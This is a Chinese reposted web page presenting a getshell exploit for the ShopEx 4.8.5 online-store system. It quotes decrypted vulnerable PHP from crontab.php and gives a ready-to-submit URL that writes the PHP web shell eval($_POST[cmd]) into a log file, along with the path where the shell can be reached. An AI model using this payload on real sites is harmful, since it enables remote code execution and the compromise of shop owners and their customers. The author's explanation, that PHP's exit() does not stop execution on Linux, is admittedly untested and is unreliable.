打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
Shopex 4.8.5.45144 getshell 0day

  ShopEx网店系统销售平台,是国内最早的网店软件提供商之一;是目前国内网店系统持续研发最久的公司;是目前网店软件国内市场占有率最高的软件提供商;是目前网店软件行业内规模最大的公司。

漏洞描述:crontab.php变量未进行严格过滤,发现linux的对php exit()不会退出,继续往下执行。于是漏洞产生了。

漏洞代码:
coreinclude_v5crontab.php zend加密后的,我只发布解密后的代码。
public function run( )
{
$this->logFile = HOME_DIR."/logs/access.log.php";
$this->now = time( );
$this->viewStat( );
$messenger =& $this->loadModel( "system/messenger" );
$messenger->runQueue( );
}
public function viewStat( )
{
if ( !file_exists( $this->logFile ) )
{
file_put_contents( $this->logFile, "#<?php exit()?>" ); //囧之处!By:小翔
}
if ( isset( $_GET[action] ) )
{
error_log( $this->now." ".$_GET[action]." ".$_GET[p]."", 3, $this->logFile );//没有任何过滤,


漏洞利用:

不知道原理,只测试了几个站,发现linux的对php exit()不会退出,继续往下执行。于是漏洞产生了。
直接提交:http://127.0.0.1/shopex/?cron=1&action=1&p=1<?php%20eval($_POST[cmd])?>
一句话在:http://127.0.0.1/shopex/home/logs/access.log.php

本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
Android日志系统Logcat源代码简要分析
Shell 脚本实战:日志关键字监控 自动告警
常用的网站程序有哪些?
2008年最流行的免费个人网店系统
最危险的15款常用软件 你用了那几款?
centos6.2企业级LNMP环境搭建
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服